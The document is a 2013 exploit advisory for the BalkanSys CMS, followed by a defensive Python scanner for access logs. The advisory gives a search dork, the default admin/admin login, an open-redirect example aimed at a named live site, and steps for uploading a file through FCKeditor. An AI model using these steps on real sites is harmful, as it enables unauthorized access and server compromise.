BalkanSys suffers from default credentials, arbitrary file upload, and open redirection vulnerabilities. Note that this advisory has site-specific information.
#Title : BalkanSys Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 10/26/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://balkansys.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security | Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerability : Default Password, Open Redirection, Arbitrary File Upload
#Dork : inurl:/?act=show_page
Admin Login bypass using the default username and password
http://site-target/admin/
Username : admin
Password : admin
============================================================================================
Open Redirection
http://site-target/index.php?act=redirect&bid=1&url=[URL Redirect]
Example :
http://orpheusclub.com/index.php?act=redirect&bid=1&url=http://newbie-security.or.id/
============================================================================================
Arbitrary File Upload (FCKeditor) - Special thanks to ReC0ded
http://site-target/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
1. Change the Type from ASP to PHP
2. Select your file and click "Send to Server"
3. The uploaded file is then stored at
http://site-target/site_files/UserFiles/[YOUR_FILE].txt
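As an added defender-side example (not part of this advisory), the following Python scans web-server access logs for the two web vectors above: index.php redirect requests whose url parameter points off-site, and any request into the FCKeditor filemanager connectors directory. The hostname in SITE_HOST and the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed hostname of the BalkanSys site being monitored (constructed).
SITE_HOST = "www.example.com"

# Constructed sample access-log lines in Apache common-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [26/Oct/2013:10:00:01 +0000] "GET /index.php?act=redirect&bid=1&url=http%3A%2F%2Fattacker.example%2F HTTP/1.1" 302 -
203.0.113.5 - - [26/Oct/2013:10:00:02 +0000] "GET /index.php?act=redirect&bid=2&url=%2Fproducts%2F HTTP/1.1" 302 -
203.0.113.9 - - [26/Oct/2013:10:01:00 +0000] "GET /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 1234
198.51.100.2 - - [26/Oct/2013:10:02:00 +0000] "GET /?act=show_page&id=3 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_external_redirect(url_value: str, site_host: str) -> bool:
    """True if a (decoded) url parameter would send the browser away from site_host.

    Handles absolute URLs, scheme-relative //host forms, backslash variants
    and user@host tricks; plain relative paths are treated as safe."""
    target = url_value.strip().replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative: only our own host is acceptable.
        return parts.hostname is None or parts.hostname.lower() != site_host.lower()
    return False


def analyse_log(text: str, site_host: str = SITE_HOST) -> list:
    """Return (ip, finding) pairs for requests matching the advisory's web vectors."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, parsed = m.group("ip"), urlsplit(m.group("path"))
        qs = parse_qs(parsed.query)  # parse_qs percent-decodes the values
        if qs.get("act") == ["redirect"]:
            for u in qs.get("url", []):
                if is_external_redirect(u, site_host):
                    findings.append((ip, "open redirect to external target: " + u))
        if "/fckeditor/editor/filemanager/connectors/" in parsed.path.lower():
            findings.append((ip, "FCKeditor connector request: " + parsed.path))
    return findings
```

Feed real log text to analyse_log() with the deployment's own hostname; the connector check fires on any hit under the connectors directory, which is the path the advisory's upload steps go through.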